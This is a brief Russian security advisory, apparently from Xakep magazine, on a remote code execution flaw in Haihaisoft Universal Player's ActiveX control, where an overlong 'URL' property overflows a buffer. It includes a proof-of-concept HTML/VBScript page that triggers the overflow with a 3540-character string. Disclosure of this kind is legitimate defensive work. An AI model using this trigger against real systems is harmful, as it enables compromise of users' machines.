Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа:
Haihaisoft Universal Player 1.x
Haihaisoft Universal Player ActiveX Control 1.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в
ActiveX компоненте (MyActiveX.ocx). Атакующий может присвоить очень длинную
строку свойству "URL", что приведет к выполнению произвольного кода.
Эксплоит:
<object classid='clsid:1A01FF01-EA62-4702-B837-1E07158145FA' id='test'>
</object>
<script language='vbscript'>
buff = String(3540, "A")
test.URL = "http://" + buff
</script>